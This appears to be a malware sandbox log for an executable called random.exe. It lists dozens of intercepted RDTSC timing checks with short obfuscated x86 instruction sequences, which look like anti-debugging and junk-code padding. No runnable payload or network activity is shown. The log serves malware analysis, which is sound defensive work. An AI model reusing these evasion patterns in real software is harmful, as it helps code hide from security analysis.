Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC911A second address: FC9124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC94E6 second address: FC94EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9AA7 second address: FC9AAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB49D second address: FCB4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c add dword ptr [ebp+122D1ABFh], esi 0x00000012 push 00000000h 0x00000014 or si, 4065h 0x00000019 push 00000000h 0x0000001b xor dword ptr [ebp+122D254Fh], ebx 0x00000021 xchg eax, ebx 0x00000022 jng 00007F8D38B7BCA4h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCAC93 second address: FCAC9D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB4E9 second address: FCB4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCAC9D second address: FCACA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB4EF second address: FCB4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB4F4 second address: FCB4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBDB9 second address: FCBDBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBDBE second address: FCBDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD0014 second address: FD006A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b nop 0x0000000c mov si, C088h 0x00000010 push 00000000h 0x00000012 cld 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F8D38B7BC88h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D1B4Ah] 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 jmp 00007F8D38B7BC91h 0x0000003e pop ecx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD006A second address: FD0071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCE90C second address: FCE91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38B7BC8Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCE91A second address: FCE91E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD334F second address: FD336E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC93h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD336E second address: FD3372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCFDC0 second address: FCFDC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCFDC6 second address: FCFDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD4420 second address: FD4438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8D38B7BC8Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD45B5 second address: FD45BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD56FB second address: FD5705 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8D38B7BC8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD85FB second address: FD85FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9500 second address: FD9575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb edi, 7E1E014Eh 0x00000013 push 00000000h 0x00000015 jbe 00007F8D38B7BC9Bh 0x0000001b push 00000000h 0x0000001d jmp 00007F8D38B7BC92h 0x00000022 xchg eax, esi 0x00000023 push ecx 0x00000024 jmp 00007F8D38B7BC90h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8D38B7BC8Ah 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9575 second address: FD957F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDA40C second address: FDA41B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD323 second address: FDD327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE1676 second address: FE167A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE292 second address: FDE298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB53D second address: FDB543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDF367 second address: FDF36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE167A second address: FE1715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8D38B7BC88h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F8D38B7BC99h 0x0000002d mov dword ptr [ebp+122D201Ah], ecx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3400h], edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F8D38B7BC88h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 add edi, 28D07100h 0x0000005d mov dword ptr [ebp+122D2C86h], edi 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F8D38B7BC8Eh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE298 second address: FDE29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB543 second address: FDB5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov bx, cx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bx, EDA7h 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp+122D0F5Dh] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F8D38B7BC88h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D2C9Ch], esi 0x00000044 xor edi, dword ptr [ebp+122D2C11h] 0x0000004a push FFFFFFFFh 0x0000004c push ecx 0x0000004d and edi, dword ptr [ebp+122D2B45h] 0x00000053 pop ebx 0x00000054 call 00007F8D38B7BC90h 0x00000059 jns 00007F8D38B7BC93h 0x0000005f pop ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 js 00007F8D38B7BC8Ch 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD5A2 second address: FDD5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE1715 second address: FE171A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB5C9 second address: FDB5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE171A second address: FE172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jbe 00007F8D38B7BC86h 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDB5CD second address: FDB5D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE373 second address: FDE377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE377 second address: FDE37D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE37D second address: FDE398 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8D38B7BC8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F8D38B7BC86h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE398 second address: FDE39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE39E second address: FDE3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8D38B7BC86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE2799 second address: FE27AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jno 00007F8D38E56376h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE1886 second address: FE188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE27AA second address: FE2812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F8D38E56376h 0x0000000c jmp 00007F8D38E56388h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D1B1Ah], eax 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F8D38E56378h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov ebx, edx 0x00000038 push 00000000h 0x0000003a movzx ebx, bx 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F8D38E5637Eh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE2812 second address: FE2824 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F8D38B7BC86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE188B second address: FE1939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F8D38E56387h 0x00000010 jmp 00007F8D38E56381h 0x00000015 nop 0x00000016 sub edi, dword ptr [ebp+122D227Eh] 0x0000001c mov edi, dword ptr [ebp+122D3486h] 0x00000022 push dword ptr fs:[00000000h] 0x00000029 and edi, dword ptr [ebp+1246D9B7h] 0x0000002f mov edi, dword ptr [ebp+122D2BB1h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F8D38E56378h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 call 00007F8D38E56386h 0x0000005b mov ebx, dword ptr [ebp+122D2FDFh] 0x00000061 pop edi 0x00000062 mov eax, dword ptr [ebp+122D1725h] 0x00000068 xor ebx, 3FC53A3Ch 0x0000006e push FFFFFFFFh 0x00000070 stc 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE1939 second address: FE1944 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE3783 second address: FE3796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D38E56376h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F8D38E56376h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE3796 second address: FE3811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8D38B7BC8Bh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F8D38B7BC88h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d pushad 0x0000002e jmp 00007F8D38B7BC8Ah 0x00000033 or bh, 0000002Bh 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F8D38B7BC88h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov bh, 08h 0x00000055 xchg eax, esi 0x00000056 push esi 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE296E second address: FE299B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E5637Eh 0x00000008 jmp 00007F8D38E5637Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jl 00007F8D38E5637Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE3811 second address: FE382B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38B7BC8Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE382B second address: FE3847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38E56388h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE6085 second address: FE6089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE6089 second address: FE6097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE6097 second address: FE60B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F8D38B7BC86h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8D38B7BC90h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEE7B2 second address: FEE7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F8D38E56378h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F93CAC second address: F93CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF84CD second address: FF84D7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8D38E56376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8638 second address: FF8653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F8D38B7BC86h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8653 second address: FF8658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8658 second address: FF8684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38B7BC91h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8684 second address: FF8688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8688 second address: FF8690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8690 second address: FF86A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8D38E56382h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8806 second address: FF880C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF880C second address: FF8810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8ADD second address: FF8AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8D38B7BC86h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 jc 00007F8D38B7BC86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8ED4 second address: FF8EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8EDA second address: FF8EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8EE0 second address: FF8EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8EE6 second address: FF8EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF8EEC second address: FF8EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD11A9 second address: FB1204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8D38B7BC86h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8D38B7BC88h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 sub cx, C400h 0x0000002e call dword ptr [ebp+122D2DD3h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 jmp 00007F8D38B7BC91h 0x0000003c pop ebx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD171B second address: FD173E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007F8D38E56395h 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8D38E56376h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD190F second address: FD1932 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 52CC5D2Fh 0x0000000f mov cl, 87h 0x00000011 call 00007F8D38B7BC89h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F8D38B7BC86h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD1932 second address: FD195A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8D38E5637Bh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jnl 00007F8D38E5637Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD195A second address: FD195E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD195E second address: FD197E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c jnl 00007F8D38E56378h 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F8D38E56376h 0x0000001e rdtsc
